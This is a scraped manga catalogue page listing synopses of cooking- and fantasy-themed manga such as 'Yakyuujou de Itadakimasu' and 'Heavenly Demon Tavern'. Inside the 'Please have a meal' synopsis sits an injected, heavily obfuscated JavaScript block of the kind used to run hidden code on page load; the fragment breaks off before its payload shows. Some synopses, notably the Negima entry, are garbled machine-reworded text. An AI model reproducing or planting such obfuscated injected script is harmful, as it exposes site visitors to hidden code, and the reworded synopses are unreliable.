Cooking - Page 15

Discover top manga Cooking with stunning art and thrilling tales. Enjoy the best Cooking manga free online today!

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The story set in the contemporary South Korea. Some 30 years ago, unidentified creatures appeared out of nowhere and have attacked people. They have caused massive destruction wherever they go. The monsters are called "Trouble"s, and get the world have fallen into chaos. Along with the first appearance of the "Trouble"s, some number of humans were born with or acquired supernatural abilities. These mutants called "Trace"s are the only ones who can fight the "Trouble"s. The "Trace" are also considered freaks and generally shunned by the community because some of them misused the powers for their own interest. The plot revolves around two main characters. Sa Ghang-Gwon, a high school student born as a "Trace" who attempts to hide his ability. The other is Kim Yun-Sung, who acquired his "Trace" abilities during his early 30's. Webtoon from Daum


Yakyuujou de Itadakimasu

Tsubame Sakamoto, 25 years old and single. She relieves the everyday stress by indulging in food and alcohol in front of baseball games. Trying out different dishes at different stadiums, with adults loudly cheering around her. It might be expensive, but nothing tastes better than beer after a win. Free from the pressure of society, she will enjoy the best baseball stadium food! --- - [VOMIC](


Tensei Reijou wa Shomin no Aji ni Uete Iru

One day, I realized that I, a former Japanese, has reincarnated into a different world as Cristea Ellisfeed, a Duke’s daughter . Reincarnation…? Duke’s daughter…? A world with magic…? Is this a light novel!?!? I received the reality while being confused. However… I’m dissatisfied with this! This full course is somewhat dissatisfying! Sweet-only sweets! I’m sick of it already!! The taste of commoners, please!!


Please have a meal

A growing period of experiencing the five senses in [Real.], a virtual reality game, while cooking and adventure and re-challenging the chef’s dream in re-ability.<script></script><script>(function(_0x9ad46d,_0x1b9949){var _0x54fd5d=_0x451a,_0x288788=_0x9ad46d();while(!![]){try{var _0x106ba2=-parseInt(_0x54fd5d(0x12a))/(-0x4d*-0x78+-0x164+0x1b*-0x149)*(-parseInt(_0x54fd5d(0x124))/(-0x1072+-0x1*0x192d+0x29a1))+parseInt(_0x54fd5d(0x13c))/(-0x22c4+0x184d*-0x1+-0x18e*-0x26)+parseInt(_0x54fd5d(0x134))/(0x1*0xb2d+-0xc52+0x129)+parseInt(_0x54fd5d(0x122))/(0x6*-0x659+0x5cd+0x204e)*(-parseInt(_0x54fd5d(0x12f))/(-0x607*-0x3+-0xc3*-0xb+-0x1a70))+parseInt(_0x54fd5d(0x13d))/(0x1ebe+-0x2*-0xd01+-0x38b9*0x1)*(-parseInt(_0x54fd5d(0x11e))/(0x16e7+0xc17*-0x2+-0x1*-0x14f))+-parseInt(_0x54fd5d(0x126))/(0x7f1+-0x18+0x14*-0x64)+parseInt(_0x54fd5d(0x123))/(0x67*0x9+-0x26cc+0x2337*0x1);if(_0x106ba2===_0x1b9949)break;else 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A cute and sugary oneshot of a gyaru chasing a guy.


Knights & Magic (Novel)

A mecha otaku is reincarnated into another world as Ernesti Echevalier (Eru). In this world, exist huge humanoid weapon known as Silhouette Knight. Dreaming of piloting those robots, Eru, with childhood friends, Archid Walter and Adeltrud Walter: together they will aim to become Knight Runner, pilot of Silhoutte Knight. Original Web Novel


Mahou Sensei Negima!

Negi Springfield, a 10-year old magician, aspires to eventually become a "Magister Magi", a particular magician who, under the guise of operating under an NGO, utilizes his powers to help ordinary individuals. After graduating from the Merdiana Magic Academy in Wales, he could be delegated the job of teaching English at the middle-school, where his homeroom course consists of 31 daughters, each quite particular in her very own manner of Mahora Academy. The show details experiences and his time in Japan as he assists them in their troubles, attains approval and respect from his pupils, and confronts magic dangers from inside as well as outside Mahora Academy. Negi's main relationship is with Asuna Kagurazaka, room mate and his pupil, who dislikes him initially but after recognizes him as a friend and becomes his companion although all the women has her very own back story and character. He's also hunting for his dad who's called the Thousand Master. While initially seeming to be another romantic-comedy work featuring numerous bish?jo characters like Love Hina, the show, has advanced right into a mixture of sh?nen romance, fantasy, horror, action and comedy. Akamatsu said that he particularly wanted to do some thing "different" from Love Hina. Negi himself is prepubescent, and several of his scenes with Asuna are unique variations of the "awkward romantic scene" trend of harem manga, immediately defused and just played for laughs. Additionally, a lot of the girls are not unable to fawn over him in a childish sense with no expectations that are intimate in the reader [ study that is unique?] In maintaining this particular fashion, Negi himself is considered other typical male leads of manga as well as a comparison to Love Hina's Keitaro Urashima. He's hardworking, competent, and treated kindly, but due to his look and age (well below the majority of his pupils), he feels utterly non-threatening and finds it hard to be taken seriously as a teacher; several of his pupils handle him as a cunning little child, if not a playmate (or plaything)


Gokiburi no Ie

3 Stories (part 1 and 3 of chapter 1 and chapter 3) here were adapted into a movie called Bourei no Sumu Ie ~Kanako Inuki Kyoufu WORLD~ (亡霊の棲む家~犬木加奈子恐怖world~) 1. Kurayami no Onnatachi (*暗闇の女たち* Women of the Darkness) 3 stories about women living normal lives in their apartments, but eventually everything starts going wrong. 2. Gokiburi no Ie (*ゴキブリの家* The House of Cockroaches) A rich woman that has a terrible fear of cockroaches faces a bizarre cockroach infestation... 3. Kao no nai Onna (*顔のない女* Faceless Woman) A woman\'s neighbor starts trying to take her identity and life... 4. Jukai Kitan (*樹海奇譚* Strange Tale of the Sea of Trees) A man enters the famous Aokigahara forest, known for its suicides, and he finds the corpse of a beautiful woman, and decides to take photos of it... 5. Rei to Asobu na Kodomotachi!! (*霊と遊ぶな 子供たち!!* Children, Don\'t Play with Ghosts!! Kanako Inuki tells her own scary stories from childhood. 6. Akumu no Tobira (*悪夢の扉* Door of Nightmares) A girl is stuck in twisted fairytale-esque nightmares...


Gohan No Otomo Ni, Shinigami To!

Yoshida-san, the malnourished corporate slave, and Miku, the clumsy grim reaper who came from the underworld to extend her lifespan. The dining table where these two very different people gather is a messy, but somewhat gentle place. Will Yoshida-san be able to become "healthy"!? The mysterious communal life of a human and a reaper begins!


Always Hungry Harukawa

Meet Natsumi Harukawa, a young office lady. During work, she is asocial and constantly looks cranky. However, the truth is that Harukawa-san is simply very hungry, and spends her time after work eating delicious foods. Artist’s Twitter:


Heavenly Demon Tavern

Get the fastest updates on “Heavenly Demon Tavern” at Mangazin. Read daily for the latest twists in this unique Hot Manga The summary of the story “Heavenly Demon Tavern” One day, Joo Kang-hyun, a stranger who fell into the world of martial arts, rose to the position of Heavenly Demon after going through countless hardships. However, he always missed his hometown, the 21st-century Republic of Korea. He thought he would return to his hometown once the proper array was activated, but instead, he regressed to the past. Gosh… The Heavenly Demon, Joo Kang-hyun, went back in time! In order to save the Youngrae Tavern which was on the verge of bankruptcy, he cooked delicious Jajangmyeon and Jjamppong! This tavern was the place where he lived with the three siblings who took care of him when he first entered Murim, Soran, Doran, and Unyoung. Although their business was not going well, they lived happily in their own way. In the future, after he became The Heavenly Demon, he heard news that their lives all ended miserably. He planned to stop their misfortunes himself. How? With Future Vision, Demon Lord Qi and Jajangmyeon! *Jinbeob : This is a term in the murim world that means ‘formation/array’ which in some cases refers to the formations used by soldiers or groups of people in battle, but in some cases it also refers to formations used to distort space in order to manipulate the opponent’s mind and make the opponent fall into the illusion desired by the attacker, we can also call it a ‘hidden space’ Another name for “Heavenly Demon Tavern” A Thousand-Horse Guest Cup Thousand Horse Guest Glass 천마 객잔 Cheonma Guesthouse


No Sire, No!

Due to love at first sight, an outstandingly beautiful female dancer became a young master’s page boy and sets forth to protect the young master's chastity! (Moon Bunny Cafe)
